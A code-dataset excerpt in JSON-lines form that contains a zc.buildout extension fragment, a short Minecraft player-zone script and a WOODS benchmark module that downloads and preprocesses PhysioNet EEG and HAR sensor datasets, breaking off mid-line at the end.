os.rename(setup_cfg, setup_cfg+'-develop-aside')\n def restore_old_setup():\n if os.path.exists(setup_cfg):\n os.remove(setup_cfg)\n os.rename(setup_cfg+'-develop-aside', setup_cfg)\n undo.append(restore_old_setup)\n else:\n open(setup_cfg, 'w')\n undo.append(lambda: os.remove(setup_cfg))\n setuptools.command.setopt.edit_config(\n setup_cfg, dict(build_ext=build_ext))\n\n fd, tsetup = tempfile.mkstemp()\n undo.append(lambda: os.remove(tsetup))\n undo.append(lambda: os.close(fd))\n\n os.write(fd, (runsetup_template % dict(\n # we reverse the order because we want the user paths to be inserted last ([::-1]).\n paths=os.pathsep.join(tools.get_pythonpath(working_set, self.buildout, self.installer.prefixes)[::-1]),\n setup=setup,\n setupdir=directory,\n __file__ = setup,\n )).encode())\n\n tmp3 = tempfile.mkdtemp('build', dir=dest)\n undo.append(lambda : shutil.rmtree(tmp3))\n\n args = [executable, tsetup, '-q', 'develop', '-mxN', '-d', tmp3]\n if self.verbose: args[2] = '-v'\n\n logger.debug(\"in: %r\\n%s\", directory, ' '.join(args))\n\n zc.buildout.easy_install.call_subprocess(args)\n\n return zc.buildout.easy_install._copyeggs(tmp3, dest, '.egg-link', undo)\n\n finally:\n undo.reverse()\n [f() for f in undo]\n\n\ndef _dists_sig(dists):\n '''Override of zc.buildout.buildout._dists_sig() to avoid excessive\n directory hashing on \"normal\" distributions'''\n\n seen = set()\n result = []\n for dist in dists:\n if dist in seen:\n continue\n seen.add(dist)\n location = dist.location\n result.append(os.path.basename(location))\n return result\n\n\ndef extension(buildout):\n \"\"\"Monkey patches zc.buildout.easy_install.develop\"\"\"\n\n ext = Extension(buildout)\n zc.buildout.easy_install.develop = ext.develop\n zc.buildout.easy_install.Installer._call_easy_install = ext.installer\n zc.buildout.buildout._dists_sig = _dists_sig\n","sub_path":"bob/buildout/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"617255786","text":"import mcpi.minecraft as minecraft\nimport time\nmc = minecraft.Minecraft.create(\"172.107.176.98\")\n\nZ2 = -252\nZ1 = -258\nX1 = 286\nX2 = 296\nHOME_X = X2 + 2\nHOME_Y = 80\nHOME_Z = Z2 - 2\n\nrent = 0\ninField = 0\n\nwhile True:\n time.sleep(1)\n pos = mc.player.getTilePos()\n if X1 < pos.x < X2 and Z1 < pos.z < Z2:\n rent = rent+1\n mc.postToChat (\"You have been in the No-No Zone for \" + str(rent) + \" seconds.\")\n inField = inField+1\n else:\n inField = 0\n if inField > 5:\n mc.postToChat(\"You have been expelled from the No-No Zone!\")\n mc.player.setPos(HOME_X, HOME_Y, HOME_Z)\n rent = 0","sub_path":"MinecraftScripts/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"340443551","text":"\"\"\"This module is used to run yourself the raw download and preprocessing of the data\n\nYou can directly download the preprocessed data with the download.py module. \nThis module is used only for transparancy of how the datasets are preprocessed.\nIt also gives the opportunity to the most curageous to change the preprocessing approaches of the data for curiosity.\n\nNote:\n The intention of releasing the benchmarks of woods is to investigate the performance of domain generalization techniques.\n Although some preprocessing tricks could lead to better OoD performance, this approach is not encouraged when using the WOODS benchmarks.\n\"\"\"\n\nimport os\nimport csv\nimport mne\nimport copy\nimport json\nimport glob\nimport h5py\nimport xlrd\nimport argparse\nimport datetime\nimport numpy as np\nimport subprocess\nimport pyedflib\n\n# Local import\nfrom woods.datasets import DATASETS\n\n# Preprocessing tools imports\nfrom scipy.signal import resample\nfrom sklearn.preprocessing import scale\n\n# Torch import\nimport torchvision\nfrom torchvision.transforms import Compose, Resize, Lambda\nfrom torchvision.transforms._transforms_video import (\n ToTensorVideo,\n NormalizeVideo,\n)\nfrom pytorchvideo.transforms import UniformTemporalSubsample\n\n# For MI dataset\nfrom moabb.datasets import BNCI2014001, Cho2017, PhysionetMI\nfrom moabb.paradigms import MotorImagery\nfrom moabb import utils\n\n# For LSA64 dataset\nfrom mega import Mega\n\nclass CAP():\n \"\"\" Fetch the data from the PhysioNet website and preprocess it \n\n The download is automatic but if you want to manually download::\n\n wget -r -N -c -np https://physionet.org/files/capslpdb/1.0.0/\n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n files = [\n [ 'physionet.org/files/capslpdb/1.0.0/nfle29',\n 'physionet.org/files/capslpdb/1.0.0/nfle7',\n 'physionet.org/files/capslpdb/1.0.0/nfle1',\n 'physionet.org/files/capslpdb/1.0.0/nfle5',\n 'physionet.org/files/capslpdb/1.0.0/n11',\n 'physionet.org/files/capslpdb/1.0.0/rbd18',\n 'physionet.org/files/capslpdb/1.0.0/plm9',\n 'physionet.org/files/capslpdb/1.0.0/nfle35',\n 'physionet.org/files/capslpdb/1.0.0/nfle36',\n 'physionet.org/files/capslpdb/1.0.0/nfle2',\n 'physionet.org/files/capslpdb/1.0.0/nfle38',\n 'physionet.org/files/capslpdb/1.0.0/nfle39',\n 'physionet.org/files/capslpdb/1.0.0/nfle21'],\n [ 'physionet.org/files/capslpdb/1.0.0/nfle10',\n 'physionet.org/files/capslpdb/1.0.0/nfle11',\n 'physionet.org/files/capslpdb/1.0.0/nfle19',\n 'physionet.org/files/capslpdb/1.0.0/nfle26',\n 'physionet.org/files/capslpdb/1.0.0/nfle23'],\n [ 'physionet.org/files/capslpdb/1.0.0/rbd8',\n 'physionet.org/files/capslpdb/1.0.0/rbd5',\n 'physionet.org/files/capslpdb/1.0.0/rbd11',\n 'physionet.org/files/capslpdb/1.0.0/ins8',\n 'physionet.org/files/capslpdb/1.0.0/rbd10'],\n [ 'physionet.org/files/capslpdb/1.0.0/n3',\n 'physionet.org/files/capslpdb/1.0.0/nfle30',\n 'physionet.org/files/capslpdb/1.0.0/nfle13',\n 'physionet.org/files/capslpdb/1.0.0/nfle18',\n 'physionet.org/files/capslpdb/1.0.0/nfle24',\n 'physionet.org/files/capslpdb/1.0.0/nfle4',\n 'physionet.org/files/capslpdb/1.0.0/nfle14',\n 'physionet.org/files/capslpdb/1.0.0/nfle22',\n 'physionet.org/files/capslpdb/1.0.0/n5',\n 'physionet.org/files/capslpdb/1.0.0/nfle37'],\n [ 'physionet.org/files/capslpdb/1.0.0/nfle3',\n 'physionet.org/files/capslpdb/1.0.0/nfle40',\n 'physionet.org/files/capslpdb/1.0.0/nfle15',\n 'physionet.org/files/capslpdb/1.0.0/nfle12',\n 'physionet.org/files/capslpdb/1.0.0/nfle28',\n 'physionet.org/files/capslpdb/1.0.0/nfle34',\n 'physionet.org/files/capslpdb/1.0.0/nfle16',\n 'physionet.org/files/capslpdb/1.0.0/nfle17']\n ]\n\n def __init__(self, flags):\n super(CAP, self).__init__()\n\n ## Download \n download_process = subprocess.Popen(['wget', '-r', '-N', '-c', '-np', 'https://physionet.org/files/capslpdb/1.0.0/', '-P', flags.data_path])\n download_process.wait()\n \n ## Process data into machines\n common_channels = self.gather_EEG(flags)\n\n ## Cluster data into machines and save\n for i, env_set in enumerate(self.files):\n\n for j, recording in enumerate(env_set):\n\n # Create data path\n edf_path = os.path.join(flags.data_path, recording + '.edf')\n txt_path = os.path.join(flags.data_path, recording + '.txt')\n\n # Fetch all data\n data = mne.io.read_raw_edf(edf_path)\n ch = [og_ch for og_ch in data.ch_names if og_ch.lower() in common_channels]\n data = data.pick_channels(ch)\n labels, times = self.read_annotation(txt_path)\n\n # Get labels\n labels = self.string_2_label(labels)\n\n # Sample and filter\n data.resample(100)\n data.filter(l_freq=0.3, h_freq=30)\n\n # Get the indexes\n start = data.info['meas_date']\n times = [(t_s.replace(tzinfo=start.tzinfo), t_e.replace(tzinfo=start.tzinfo)) for (t_s, t_e) in times]\n time_diff = [ ((t_s - start).total_seconds(), (t_e - start).total_seconds()) for (t_s, t_e) in times]\n t_s, t_e = [t_s for (t_s, t_e) in time_diff], [t_e for (t_s, t_e) in time_diff]\n index_s = data.time_as_index(t_s)\n index_e = data.time_as_index(t_e)\n\n # Split the data \n seq = np.array([data.get_data(start=s, stop=e) for s, e in zip(index_s, index_e) if e <= len(data)])\n labels = np.array([[l] for l, e in zip(labels, index_e) if e <= len(data)])\n\n # Add data to container\n env_data = np.zeros((0, 19, 3000))\n env_labels = np.zeros((0, 1))\n env_data = np.append(env_data, seq, axis=0)\n env_labels = np.append(env_labels, labels, axis=0)\n\n # Reshape and scale the data\n sc = mne.decoding.Scaler(scalings='mean')\n env_data = sc.fit_transform(env_data)\n env_data = np.transpose(env_data, (0,2,1))\n\n with h5py.File(os.path.join(flags.data_path, 'physionet.org/CAP_DB.h5'), 'a') as hf:\n if j == 0:\n g = hf.create_group('Machine' + str(i))\n g.create_dataset('data', data=env_data.astype('float32'), dtype='float32', maxshape=(None, 3000, 19))\n g.create_dataset('labels', data=env_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n else:\n hf['Machine' + str(i)]['data'].resize((hf['Machine' + str(i)]['data'].shape[0] + env_data.shape[0]), axis = 0)\n hf['Machine' + str(i)]['data'][-env_data.shape[0]:,:,:] = env_data\n hf['Machine' + str(i)]['labels'].resize((hf['Machine' + str(i)]['labels'].shape[0] + env_labels.shape[0]), axis = 0)\n hf['Machine' + str(i)]['labels'][-env_labels.shape[0]:,:] = env_labels\n \n # Remove useless files\n self.remove_useless(flags)\n\n def remove_useless(self, flags):\n \"\"\" Remove useless files \"\"\"\n\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0/*')):\n print(\"Removing: \", file)\n os.remove(file)\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files'))\n print(\"Removing: \", os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n os.remove(os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n\n def string_2_label(self, string):\n \"\"\" Convert string to label \"\"\"\n \n label_dict = { 'W':0,\n 'S1':1,\n 'S2':2,\n 'S3':3,\n 'S4':4,\n 'R':5}\n \n labels = [label_dict[s] for s in string]\n\n return labels\n\n def read_annotation(self, txt_path):\n \"\"\" Read annotation file for the CAP dataset\"\"\"\n\n # Initialize storage\n labels = []\n times = []\n durations = []\n\n with open(txt_path, 'r') as file:\n lines = file.readlines()\n\n in_table = False\n for line in lines:\n if line[0:16] == 'Recording Date:\t':\n date = [int(u) for u in line.strip('\\n').split('\\t')[1].split('/')]\n\n if in_table:\n line_list = line.split(\"\\t\")\n if line_list[event_id][0:5] == 'SLEEP' and (position_id == None or line_list[position_id] != 'N/A'):\n labels.append(line_list[label_id])\n durations.append(line_list[duration_id])\n t = line_list[time_id].split(':') if ':' in line_list[time_id] else line_list[time_id].split('.')\n t = [int(u) for u in t]\n dt = datetime.datetime(*date[::-1], *t) + datetime.timedelta(days=int(t[0]<12))\n times.append((dt, dt + datetime.timedelta(seconds=int(line_list[duration_id]))))\n\n if line[0:11] == 'Sleep Stage':\n columns = line.split(\"\\t\")\n label_id = columns.index('Sleep Stage')\n time_id = columns.index('Time [hh:mm:ss]')\n duration_id = columns.index('Duration[s]')\n try:\n position_id = columns.index('Position')\n except ValueError:\n position_id = None\n event_id = columns.index('Event')\n in_table = True\n\n return labels, times\n\n def gather_EEG(self, flags):\n \"\"\" Gets the intersection of common channels across all machines \n \n Returns:\n list: list of channels (strings)\n \"\"\"\n machine_id = 0\n machines = {}\n edf_file = []\n table = []\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0/*.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n\n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n \n _table = []\n for id, machine in machines.items():\n if machine['amount'] > 4:\n ch = [c[0] for c in machine['state']]\n freq = [c[1] for c in machine['state']]\n\n _table.append(set(ch))\n print(\"___________________________________________________\")\n print(\"Machine ID: \", id)\n print(\"Recording amount: \", machine['amount'])\n print(\"Channels: \", ch)\n print('Freqs: ', freq)\n print(\"Dates:\")\n for d in machine['dates']:\n print(d)\n print(\"Files:\")\n for f in machine['names']:\n print(f)\n\n return list(set.intersection(*_table))\n \nclass SEDFx_DB():\n \"\"\" Fetch the PhysioNet Sleep-EDF Database Expanded Dataset and preprocess it\n \n The download is automatic but if you want to manually download::\n\n wget -r -N -c -np https://physionet.org/files/sleep-edfx/1.0.0/\n \n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n def __init__(self, flags):\n super(SEDFx_DB, self).__init__()\n\n ## Download \n download_process = subprocess.Popen(['wget', '-r', '-N', '-c', '-np', 'https://physionet.org/files/sleep-edfx/1.0.0/', '-P', flags.data_path])\n download_process.wait()\n \n ## Process data into machines\n common_channels = self.gather_EEG(flags)\n\n ## Set labels\n label_dict = { 'Sleep stage W':0,\n 'Sleep stage 1':1,\n 'Sleep stage 2':2,\n 'Sleep stage 3':3,\n 'Sleep stage 4':4,\n 'Sleep stage R':5}\n\n ## Get subjects from xls file\n SC_dict = {}\n SC_xls = xlrd.open_workbook(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/SC-subjects.xls')).sheet_by_index(0)\n for row in range(1, SC_xls.nrows):\n if int(SC_xls.cell_value(row,0)) not in SC_dict.keys():\n SC_dict[int(SC_xls.cell_value(row,0))] = {}\n SC_dict[int(SC_xls.cell_value(row,0))]['nights'] = ['SC4{:02d}{}'.format(int(SC_xls.cell_value(row,0)), int(SC_xls.cell_value(row,1)))]\n SC_dict[int(SC_xls.cell_value(row,0))]['folder'] = 'physionet.org/files/sleep-edfx/1.0.0/sleep-cassette'\n else:\n SC_dict[int(SC_xls.cell_value(row,0))]['nights'].append('SC4{:02d}{}'.format(int(SC_xls.cell_value(row,0)), int(SC_xls.cell_value(row,1))))\n SC_dict[int(SC_xls.cell_value(row,0))]['age'] = int(SC_xls.cell_value(row,2))\n SC_dict[int(SC_xls.cell_value(row,0))]['sex'] = int(SC_xls.cell_value(row,3))\n ST_dict = {}\n ST_xls = xlrd.open_workbook(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/ST-subjects.xls')).sheet_by_index(0)\n for row in range(2, ST_xls.nrows):\n ST_dict[int(ST_xls.cell_value(row,0))] = {}\n ST_dict[int(ST_xls.cell_value(row,0))]['folder'] = 'physionet.org/files/sleep-edfx/1.0.0/sleep-telemetry'\n ST_dict[int(ST_xls.cell_value(row,0))]['nights'] = ['ST7{:02d}{}'.format(int(ST_xls.cell_value(row,0)), int(ST_xls.cell_value(row,3))), \n 'ST7{:02d}{}'.format(int(ST_xls.cell_value(row,0)), int(ST_xls.cell_value(row,5)))]\n ST_dict[int(ST_xls.cell_value(row,0))]['age'] = int(ST_xls.cell_value(row,1))\n ST_dict[int(ST_xls.cell_value(row,0))]['sex'] = 2 if int(ST_xls.cell_value(row,2))==1 else 1\n\n ## Create group in h5 file\n dummy_data = np.zeros((0,3000,4))\n dummy_labels = np.zeros((0,1))\n groups = ['Age 20-40', 'Age 40-60', 'Age 60-80', 'Age 80-100']\n with h5py.File(os.path.join(flags.data_path, 'physionet.org/SEDFx_DB.h5'), 'a') as hf:\n for g in groups:\n g = hf.create_group(g)\n g.create_dataset('data', data=dummy_data.astype('float32'), dtype='float32', maxshape=(None, 3000, 4))\n g.create_dataset('labels', data=dummy_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n\n ## Cluster data into machines and save\n for db in [SC_dict, ST_dict]:\n for subject, subject_info in db.items():\n\n # Find Age group\n if 20 < subject_info['age'] <= 40:\n age_group = groups[0]\n elif 40 < subject_info['age'] <= 60:\n age_group = groups[1]\n elif 60 < subject_info['age'] <= 80:\n age_group = groups[2]\n elif 80 < subject_info['age']:\n age_group = groups[3]\n else:\n print(\"Age group counldn't be found\")\n \n for night in subject_info['nights']:\n edf_path = os.path.join(flags.data_path, subject_info['folder'], night+ '*')\n\n # Fetch file name\n PSG_file = glob.glob(edf_path+'PSG.edf')[0]\n hypno_file = glob.glob(edf_path+'Hypnogram.edf')[0]\n\n # Read raw data and pick channels\n data = mne.io.read_raw_edf(PSG_file)\n ch = [og_ch for og_ch in data.ch_names if og_ch.lower() in common_channels]\n data = data.pick_channels(ch)\n data.resample(100)\n data.filter(l_freq=0.3, h_freq=30)\n\n # Get annotations i.e. labels, crop the big start and end chunks of recordings\n annot = mne.read_annotations(hypno_file)\n annot.crop(annot[1]['onset'] - 30 * 60, annot[-2]['onset'] + 30 * 60)\n data.set_annotations(annot, emit_warning=False)\n\n events, event_id = mne.events_from_annotations(data, chunk_duration=30., event_id=label_dict)\n # mne.viz.plot_events(events, sfreq=data.info['sfreq'])\n tmax = 30. - 1. / data.info['sfreq'] # tmax in included\n\n epochs_data = mne.Epochs(raw=data, events=events,\n event_id=event_id, tmin=0., tmax=tmax, baseline=None)\n \n # Add data to container\n input_data = epochs_data.get_data()\n labels = events[:,2:]\n\n # Reshape and scale the data\n sc = mne.decoding.Scaler(scalings='mean')\n input_data = sc.fit_transform(input_data)\n input_data = np.transpose(input_data, (0,2,1))\n \n with h5py.File(os.path.join(flags.data_path, 'physionet.org/SEDFx_DB.h5'), 'a') as hf:\n hf[age_group]['data'].resize((hf[age_group]['data'].shape[0] + input_data.shape[0]), axis = 0)\n hf[age_group]['data'][-input_data.shape[0]:,:,:] = input_data\n hf[age_group]['labels'].resize((hf[age_group]['labels'].shape[0] + labels.shape[0]), axis = 0)\n hf[age_group]['labels'][-labels.shape[0]:,:] = labels\n\n # # Remove useless files\n self.remove_useless(flags)\n\n def remove_useless(self, flags):\n \"\"\" Remove useless files \"\"\"\n\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0/*')):\n print(\"Removing: \", file)\n os.remove(file)\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb/1.0.0'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files/capslpdb'))\n print(\"Removing Folder: \", os.path.join(flags.data_path, 'physionet.org/files'))\n os.rmdir(os.path.join(flags.data_path, 'physionet.org/files'))\n print(\"Removing: \", os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n os.remove(os.path.join(flags.data_path, 'physionet.org/robots.txt'))\n\n def string_2_label(self, string):\n \"\"\" Convert string to label \"\"\"\n \n label_dict = { 'W':0,\n 'S1':1,\n 'S2':2,\n 'S3':3,\n 'S4':4,\n 'R':5}\n \n labels = [label_dict[s] for s in string]\n\n return labels\n\n def read_annotation(self, txt_path):\n \"\"\" Read annotation file \"\"\"\n\n # Initialize storage\n labels = []\n times = []\n durations = []\n\n with open(txt_path, 'r') as file:\n lines = file.readlines()\n\n in_table = False\n for line in lines:\n if line[0:16] == 'Recording Date:\t':\n date = [int(u) for u in line.strip('\\n').split('\\t')[1].split('/')]\n\n if in_table:\n line_list = line.split(\"\\t\")\n if line_list[event_id][0:5] == 'SLEEP' and (position_id == None or line_list[position_id] != 'N/A'):\n labels.append(line_list[label_id])\n durations.append(line_list[duration_id])\n t = line_list[time_id].split(':') if ':' in line_list[time_id] else line_list[time_id].split('.')\n t = [int(u) for u in t]\n dt = datetime.datetime(*date[::-1], *t) + datetime.timedelta(days=int(t[0]<12))\n times.append((dt, dt + datetime.timedelta(seconds=int(line_list[duration_id]))))\n\n if line[0:11] == 'Sleep Stage':\n columns = line.split(\"\\t\")\n label_id = columns.index('Sleep Stage')\n time_id = columns.index('Time [hh:mm:ss]')\n duration_id = columns.index('Duration[s]')\n try:\n position_id = columns.index('Position')\n except ValueError:\n position_id = None\n event_id = columns.index('Event')\n in_table = True\n\n return labels, times\n\n def gather_EEG(self, flags):\n \"\"\" Gets the intersection of common channels across all machines \n \n Returns:\n list: list of channels (strings)\n \"\"\"\n\n machine_id = 0\n machines = {}\n edf_file = []\n table = []\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/sleep-telemetry/*PSG.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n \n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n\n for file in glob.glob(os.path.join(flags.data_path, 'physionet.org/files/sleep-edfx/1.0.0/sleep-cassette/*PSG.edf')):\n\n # Fetch all data from file\n edf_file.append(file)\n try:\n data = pyedflib.EdfReader(file)\n except OSError:\n print(\"Crashed\")\n continue\n \n ch_freq = data.getSampleFrequencies()\n data = mne.io.read_raw_edf(file)\n ch = [c.lower() for c in data.ch_names]\n\n # Create state Dict (ID)\n state_dict = {}\n for n, f in zip(ch, ch_freq):\n state_dict[n] = f\n state_set = set(state_dict.items())\n\n # Create or assign ID\n if state_set not in table:\n id = copy.deepcopy(machine_id)\n machine_id +=1\n table.append(state_set)\n else:\n id = table.index(state_set)\n\n # Add of update the dictionnary\n if id not in machines.keys():\n machines[id] = {}\n machines[id]['state'] = state_set\n machines[id]['amount'] = 1\n machines[id]['dates'] = [data.info['meas_date']]\n machines[id]['names'] = [file]\n else:\n machines[id]['amount'] += 1 \n machines[id]['dates'].append(data.info['meas_date'])\n machines[id]['names'].append(file)\n \n _table = []\n for id, machine in machines.items():\n if machine['amount'] > 4:\n ch = [c[0] for c in machine['state']]\n freq = [c[1] for c in machine['state']]\n\n _table.append(set(ch))\n print(\"___________________________________________________\")\n print(\"Machine ID: \", id)\n print(\"Recording amount: \", machine['amount'])\n print(\"Channels: \", ch)\n print('Freqs: ', freq)\n print(\"Dates:\")\n for d in machine['dates']:\n print(d)\n print(\"Files:\")\n for f in machine['names']:\n print(f)\n\n return list(set.intersection(*_table))\n\n\ndef RealizedVolatility(flags):\n \"\"\" Fetch the realized volatility dataset from Yahoo Finance and preprocess it \n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n with open(os.path.join(flags.data_path, 'RealizedVolatility/OxfordManRealizedVolatilityIndices.csv')) as f:\n data = csv.reader(f)\n print(next(data))\n for row in data:\n print(row)\n \n\ndef HAR(flags):\n \"\"\" Fetch and preprocess the HAR dataset\n\n Note:\n You need to manually download the HAR dataset from the source and place it in the data folder in order to preprocess it yourself:\n\n https://archive.ics.uci.edu/ml/datasets/Heterogeneity+Activity+Recognition\n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n # Label definition\n label_dict = { 'stand': 0,\n 'sit': 1,\n 'walk': 2,\n 'bike': 3,\n 'stairsup': 4,\n 'stairsdown': 5,\n 'null': 6}\n\n ## Fetch all data and put it all in a big dict\n data_dict = {}\n for file in glob.glob(os.path.join(flags.data_path, 'HAR/*.csv')):\n print(file)\n\n # Get modality\n if 'gyroscope' in file:\n mod = 'gyro'\n elif 'accelerometer' in file:\n mod = 'acc'\n\n # Get number of time steps for all recordings\n with open(file) as f:\n data = csv.reader(f)\n next(data)\n for row in data:\n if row[8] not in data_dict.keys():\n print(row[8])\n data_dict[row[8]] = {}\n if row[6] not in data_dict[row[8]].keys():\n print('\\t' + row[6])\n data_dict[row[8]][row[6]] = {}\n if mod not in data_dict[row[8]][row[6]].keys():\n print('\\t\\t' + mod)\n data_dict[row[8]][row[6]][mod] = {}\n data_dict[row[8]][row[6]][mod]['n_pt'] = 0\n \n data_dict[row[8]][row[6]][mod]['n_pt'] += 1\n\n # Get data\n with open(file) as f:\n data = csv.reader(f)\n next(data)\n for row in data:\n if 'index' not in data_dict[row[8]][row[6]][mod].keys():\n i = 0\n data_dict[row[8]][row[6]][mod]['index'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n data_dict[row[8]][row[6]][mod]['time'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n data_dict[row[8]][row[6]][mod]['meas'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt'],3), dtype=np.float64)\n data_dict[row[8]][row[6]][mod]['label'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n \n data_dict[row[8]][row[6]][mod]['index'][i] = int(row[0])\n data_dict[row[8]][row[6]][mod]['time'][i] = float(row[2]) / 1e6 # Convert to miliseconds\n data_dict[row[8]][row[6]][mod]['meas'][i,:] = [float(row[3]), float(row[4]), float(row[5])]\n data_dict[row[8]][row[6]][mod]['label'][i] = int(label_dict[row[9]])\n\n i += 1\n\n # Delete keys that either \n # - is missing one modality (e.g. all sansungold devices only have one modality for some reason)or \n # - has a number of datapoint that is too low (e.g. gear_2 -> 'i' only has 1 point for some reason)\n to_delete = []\n for device in data_dict.keys():\n for sub in data_dict[device].keys():\n if len(data_dict[device][sub].keys()) != 2:\n print(\"....\")\n print(\"len\")\n print(device, sub)\n to_delete.append((device, sub))\n continue\n for mod in data_dict[device][sub].keys():\n if data_dict[device][sub][mod]['n_pt'] < 10000:\n print(\"....\")\n print(\"n_pt\")\n print(data_dict[device][sub][mod]['n_pt'])\n print(device, sub)\n to_delete.append((device, sub))\n break\n for key in to_delete:\n del data_dict[key[0]][key[1]]\n print(to_delete)\n\n ## Sort data\n for device in data_dict.keys():\n for sub in data_dict[device].keys():\n for mod in data_dict[device][sub].keys():\n # Sort by index\n index_sort = np.argsort(data_dict[device][sub][mod]['index'])\n data_dict[device][sub][mod]['index'] = np.take_along_axis(data_dict[device][sub][mod]['index'], index_sort, axis=0)\n data_dict[device][sub][mod]['time'] = np.take_along_axis(data_dict[device][sub][mod]['time'], index_sort, axis=0)\n data_dict[device][sub][mod]['meas'] = data_dict[device][sub][mod]['meas'][index_sort,:]\n data_dict[device][sub][mod]['label'] = np.take_along_axis(data_dict[device][sub][mod]['label'], index_sort, axis=0)\n\n # This is to take data that is within recording time \n # (To see an example of somewhere this isn't the case, check phones_gyrscope -> nexus4_1 -> a -> index [24641, 24675])\n inliers = np.argwhere( np.logical_and( data_dict[device][sub][mod]['time'][0] <= data_dict[device][sub][mod]['time'], \n data_dict[device][sub][mod]['time'] <= data_dict[device][sub][mod]['time'][-1]))[:,0]\n \n # Sort by time value\n time_sort = np.argsort(data_dict[device][sub][mod]['time'][inliers])\n\n data_dict[device][sub][mod]['index'] = data_dict[device][sub][mod]['index'][inliers][time_sort]\n data_dict[device][sub][mod]['time'] = data_dict[device][sub][mod]['time'][inliers][time_sort]\n data_dict[device][sub][mod]['meas'] = data_dict[device][sub][mod]['meas'][inliers][time_sort,:]\n data_dict[device][sub][mod]['label'] = data_dict[device][sub][mod]['label'][inliers][time_sort]\n\n device_env_mapping = { 'nexus4_1': 'nexus4',\n 'nexus4_2': 'nexus4',\n 's3_1': 's3',\n 's3_2': 's3',\n 's3mini_1': 's3mini',\n 's3mini_2': 's3mini',\n 'gear_1': 'gear',\n 'gear_2': 'gear',\n 'lgwatch_1': 'lgwatch',\n 'lgwatch_2': 'lgwatch'}\n\n for device in data_dict.keys():\n for i, sub in enumerate(data_dict[device].keys()):\n print(\"..........\")\n print(device, sub)\n # print(len(data_dict[device][sub]['gyro']['time']), data_dict[device][sub]['gyro']['time'][0], data_dict[device][sub]['gyro']['time'][-1])\n # print(len(data_dict[device][sub]['acc']['time']), data_dict[device][sub]['acc']['time'][0], data_dict[device][sub]['acc']['time'][-1])\n\n tmin = np.max([data_dict[device][sub]['gyro']['time'][0], data_dict[device][sub]['acc']['time'][0]])\n tmax = np.min([data_dict[device][sub]['gyro']['time'][-1], data_dict[device][sub]['acc']['time'][-1]])\n # print(tmin, tmax)\n\n gyro_in = np.argwhere( np.logical_and( tmin <= data_dict[device][sub]['gyro']['time'], \n data_dict[device][sub]['gyro']['time'] <= tmax))[:,0]\n acc_in = np.argwhere( np.logical_and( tmin <= data_dict[device][sub]['acc']['time'], \n data_dict[device][sub]['acc']['time'] <= tmax))[:,0]\n\n data_dict[device][sub]['gyro']['index'] = 